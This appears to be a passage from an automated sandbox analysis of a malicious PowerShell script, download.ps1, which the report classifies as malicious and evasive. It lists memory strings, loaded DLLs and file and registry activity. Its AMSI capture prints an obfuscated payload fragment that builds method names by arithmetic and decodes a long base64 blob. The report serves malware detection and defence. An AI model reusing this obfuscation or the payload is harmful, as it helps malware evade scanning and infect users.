Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2Qfn9Uonm_X_4tTv321io--o9kFCHBz" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cument,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engineClassification label: mal64.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqpvwrn5.ibt.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $049h8rxnvqfbt27.(([system.String]::new(@((235505/(16643525/4735)),(238317/(5977248/2784)),(-9346+(1827+(7527+(-5188+5292)))),(-4857+(-770+(3789+(-4097+(11413-(734+(9380-(5285027/1111)))))))),(6501-(15043-(537+8089))),(-3722+3833)))))( $sgvhtey7i8axq3r ) $049h8rxnvqfbt27.(([system.String]::new(@((279926/4178),(56484/(2982-(2132+(-7110+(10569-(-4136+(1930+(-733+(10266061/(12158290/(3350540/(4170234/8949)))))))))))),(2320-(717925/325)),(9204-9089),(-9836+9937)))))()$0lu51qr8owa9zh37ywckn3xdhbuie.(([system.String]::new(@((6297-6230),(-8043+8151),(353646/(12145032/(11016-(10521-3317)))),(-212+327),(970610/(17833-8223))))))()[byte[]] $ioj8fg7y3huk5a6 = $sgvhtey7i8axq3r.(([system.String]::new(@((-8712+(9714-918)),(629481/5671),(-6254+6319),(4095-3981),(1024860/(-1084+10074)),(10114-10017),(847847/7007)))))() $uykm374xtfghd2z=$ioj8fg7y3huk5a6 return $uykm374xtfghd2z}[System.Text.Encoding]::ascii.((-join (@((216337/(4948328/1624)),(683265/(-976+(7321+420))),(4552-4436),(-855+(4385150/4675)),(760148/6553),(-6942+(373+6683)),(8509-8404),(766590/6969),(6417-(64364916/10194)))| ForEach-Object { [char]$_ })))((nvgh3e65mupyqljs8obki24acw1 "ffprNjRmdW93dp3kOf5+4UXj6iwzidm4Ap1QXwMdqkBR/jwIgE2mMNbhSWcxNmpbE1m9DyBPvJWcj24tfQMrX3BM02LgBZ43la/WnWLLIDqeuVYEBI7az/nF0pidSMKEp7qomfr5C5CViIv/7Z+/CksVC5Cmk/2rRYb8CI1aChwKjd6BNQYcTsackJKcaAaCnJpY8ctayjOMneHn/E8dwN6UiaqsWNcm3AsaQN+ePhjIA8SanPLYGYqeh6QMTSYb+kK0G7K0upELOoG1cMd3XdXBwNti4Vu0W7b15KIcaggPKEtgQxzGufApVsrGsfLHkJlOuRnpSZueL3shBHo6iX7TIYFDxYbKpC2wJH/ti6x7fUetWOZ/vAkEGFLH0zWDEHxe84R7BnHC8WbO/AKyY26nv3kR7BPT79LR7AAALhwZKvnnoYuT3/H1tnCN9gmE/TYVq80E3DSdM9MmG707uImxx/sTAWYTqseWbNduALxZRU8nJZooL42NqzUIvEuZNTylPVVbo7YqpCIb+TpsA+4D1qsVae6+AamBlOEQqECAXUWuMexaWthcrNWKIDTZp4SrZM/0F/ONtiCBFOvemYXxGahiHGb3S4elXP4QkV4CBBxJuRzbgZh1TghKDJUO+UXwIKUdmSSoSdTF58TU/OqYC5eApS+HE4adtcHJgnHtqYdEnglTqc2Uk5BtCAJDGRaqtXpMAjn3s68q5ChM4yoXVnHux1kRA+faKz/B4yWqPO1h2VLWAi+g4BRfKiwUvQQDG9jXsfvhKy8L7jTkBrcoULovoC4L0MrHpwVam8kUh7jqxaxR1GGeAI7k2p6OxjQHWo56LnUP/I/f7NIOFaMfA5WAsdvMXcs1cB7V7RyX8HUjlzoZe0mjiy7kkSigp7GfzPmqKIl9rttAWS9TdUMB3JeYJFPvrfx9Dv4LgV5maIH2SjIvTzzIPBuTks7NUFIIEzCd3cYdG76FagqiGXIzqaHpnQLzwJNAcUOQrOLk2RdWjU5b6IgahIWPmv+3DI2wudvlvA5OCUbAm4S+cRupClWPDsuag8aU6UiVgZaW3V9Xfa4+2Chm+PZDLXBJlbfxZFQtbUWZcuLsVcOefhAKm+sUwTePPO28y8KQlMiYaJ+9PoJXKiwN+Lt7iJ7bz29aLlZHM90RGgGyxertLEMq1I0Ooxbgx6uM4ZZ+Wvo2IDiU8Seme81kS13xV3i6wUmX4EyKQ4yDUe8q9Dezq6k7xu5ncRhBkF1nXv4k5MvMBBKewAipVA3wzKGXx0nOkx0aOXy6wFTdfEHVWoS6TAiwQ2Wd4rIV3v9jeLT5axoYs3dunlW4xDykMWf9G5yivrTMWKiZqxOBiu3PTW88iooVwVOBSbdXFK5aykaYDWjX6kupgCJwzqFf8KhqtrKxfF4k+01sHp+kythWM24FtEj+tqjBkgKVoTM7/NSUHapnUSJUxnebNjJ10+6+7MM31MQR1qLBTZ8xxik9SWZyGagxJGFAhtUBts1+bVPXHAF1qHqqQoZjYUCrlYByFo22sDqTHQQNl/vVJpRztQLMKKfvDsH6Es+pGlK6iMiYkIqKlWMH2Q0Sx9D9WlCMivGBCejte3H2H/8yckJljn04GiKpmd0WBTUBKVb0Nn4r3Wdr51R7UpFdWlJNiclzaoF6CnF2LeXnldULH1cG+92jOH5Q7n/NzjKxEGjODvwEQN/D5n61nDwL3XRVlv13TfpFDtNMYJjSA3mWvm6rPhvQq/R8fSBBA2tIgIp/ZcDTy/hLbJ+2YChgkYOMmQJATk6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbu source: powershell.exe, 00000000.00000002.2186794681.00000225C4C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2140421912.00000225AA652000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2140421912.00000225AA652000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbS source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2183490540.00000225C4824000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2184943759.00000225C4BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2184943759.00000225C4B17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb: source: powershell.exe, 00000000.00000002.2187129153.00000225C4CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP source: powershell.exe, 00000000.00000002.2186794681.00000225C4C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E1D2A5 pushad ; iretd 0_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F4A178 push E95C7C03h; ret 0_2_00007FF848F4A199
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F34FAB push ecx; ret 0_2_00007FF848F34FAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF84900CFE4 pushfd ; iretd 0_2_00007FF84900CFE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8491F340F pushfd ; iretd 0_2_00007FF8491F3411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8491F3D18 push es; ret 0_2_00007FF8491F3D19

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
